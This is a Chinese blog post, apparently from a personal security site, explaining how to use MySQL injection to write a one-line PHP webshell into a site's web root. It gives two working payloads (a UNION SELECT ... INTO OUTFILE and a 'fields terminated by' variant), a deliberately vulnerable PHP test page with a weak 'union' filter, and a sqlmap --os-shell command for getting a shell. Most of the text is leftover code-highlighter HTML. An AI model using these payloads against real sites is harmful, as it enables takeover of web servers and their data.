MySQL注入两种写入一句话快速拿Webshell的方法

发布于 2017-08-31  1.35k 次阅读


利用需要满足以下条件:

  1. root权限
  2. GPC关闭(能使用单引号)
  3. 有绝对路径(读文件可以不用,写文件必须)
  4. 没有配置–secure-file-priv

1.union

</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0b0450187454-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0b0450187454-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">union </span><span class="crayon-i">select</span> <span class="crayon-cn">1</span><span class="crayon-sy">,</span><span class="crayon-cn">2</span><span class="crayon-sy">,</span><span class="crayon-cn">3</span><span class="crayon-sy">,</span><span class="crayon-cn">4</span><span class="crayon-sy">,</span><span class="crayon-cn">5</span><span class="crayon-sy">,</span><span class="crayon-cn">6</span><span class="crayon-sy">,</span><span class="crayon-cn">7</span><span class="crayon-sy">,</span>'<span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span>’ <span class="crayon-e">into </span><span class="crayon-i">outfile</span> ‘<span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span>’<span class="crayon-o">%</span><span class="crayon-cn">23</span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>

<? phpinfo(); ?>为写入的内容可添加自己的一句话  /home/wwwroot/5ime.cn/luan_phpinfo.php 为已存在的网站目录下的文件即插入文件名

2.no union

</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0b8247295740-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0b8247295740-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">into </span><span class="crayon-i">outfile</span> ‘<span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span>’ <span class="crayon-e">fields</span> <span class="crayon-e">terminated</span> <span class="crayon-e">by</span> ‘<span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span>’<span class="crayon-o">%</span><span class="crayon-cn">23</span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>

第二种方法最早最早是在吐司的一个 2015-1-24 的帖子里看到的,吐司果然大牛多。
效果如下:

这里用的第二种方法是通过插入分隔符号来getshell的,所以必须查询结果有多个列
一般情况下的注入点都是符合条件的。

sqlmap利用方法

以luan_test.php为例:

</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-2" style="margin:0px;padding:0px;list-style:none;">
                            2
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-3" style="margin:0px;padding:0px;list-style:none;">
                            3
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-4" style="margin:0px;padding:0px;list-style:none;">
                            4
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-5" style="margin:0px;padding:0px;list-style:none;">
                            5
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-6" style="margin:0px;padding:0px;list-style:none;">
                            6
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-7" style="margin:0px;padding:0px;list-style:none;">
                            7
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-8" style="margin:0px;padding:0px;list-style:none;">
                            8
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-9" style="margin:0px;padding:0px;list-style:none;">
                            9
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-10" style="margin:0px;padding:0px;list-style:none;">
                            10
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-11" style="margin:0px;padding:0px;list-style:none;">
                            11
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0bc142086430-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-ta"><?php</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-2" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-sy">@</span><span class="crayon-v">$link</span><span class="crayon-o">=</span> <span class="crayon-e">mysql_connect</span><span class="crayon-sy">(</span><span class="crayon-s">"localhost"</span><span class="crayon-sy">,</span><span class="crayon-s">"root"</span><span class="crayon-sy">,</span><span class="crayon-s">""</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-3" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-e">mysql_select_db</span><span class="crayon-sy">(</span><span class="crayon-s">"mysql"</span><span class="crayon-sy">,</span><span class="crayon-v">$link</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-4" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-v">$user</span> <span class="crayon-o">=</span> <span class="crayon-e">strtolower</span><span class="crayon-sy">(</span><span class="crayon-v">$_GET</span><span class="crayon-sy">[</span><span class="crayon-s">'user'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-5" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-st">if</span><span class="crayon-sy">(</span><span class="crayon-e">strpos</span><span class="crayon-sy">(</span><span class="crayon-v">$user</span><span class="crayon-sy">,</span><span class="crayon-s">"union"</span><span class="crayon-sy">)</span> <span class="crayon-o">===</span> <span class="crayon-t">false</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-6" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-v">$sql</span><span class="crayon-o">=</span> <span class="crayon-s">"SELECT * FROM user where user='{$user}'"</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-7" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-k ">echo</span> <span class="crayon-v">$sql</span> <span class="crayon-sy">.</span> <span class="crayon-s">'<br>'</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-8" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-e">mysql_query</span><span class="crayon-sy">(</span><span class="crayon-v">$sql</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-9" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-k ">echo</span> <span class="crayon-e">mysql_errno</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span> <span class="crayon-sy">.</span> <span class="crayon-s">": "</span> <span class="crayon-sy">.</span> <span class="crayon-e">mysql_error</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span> <span class="crayon-s">" "</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-10" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-sy">}</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-11" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-ta">?></span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>

经测试,sqlmap最新版实际是支持这个方法的:

</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0be210058938-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0be210058938-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-v">C</span><span class="crayon-o">:</span><span class="crayon-sy">\</span><span class="crayon-v">luan</span><span class="crayon-sy">\</span><span class="crayon-v">sqlmap</span><span class="crayon-o">></span><span class="crayon-e">python </span><span class="crayon-v">sqlmap</span><span class="crayon-e">.py</span> <span class="crayon-o">-</span><span class="crayon-i">u</span> “<span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-o">/</span><span class="crayon-o">/</span><span class="crayon-cn">192.168.2.200</span><span class="crayon-o">/</span><span class="crayon-v">luan_test</span><span class="crayon-e">.php</span><span class="crayon-sy">?</span><span class="crayon-v">user</span><span class="crayon-o">=</span><span class="crayon-i">root</span>” –<span class="crayon-v">os</span><span class="crayon-o">-</span><span class="crayon-v">shell</span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>


但是,如果–os-shell用不了,sqlmap有个写文件的选项,经测试不成功。。。。

也就是说,sqlmap只能传自己的webshell

如果工具党遇到这种情况,直接使用sqlmap –os-shell然后用sqlmap上传的Webshell来操作就可以了。


我还是很喜欢你,像风走了八千里,不问归期~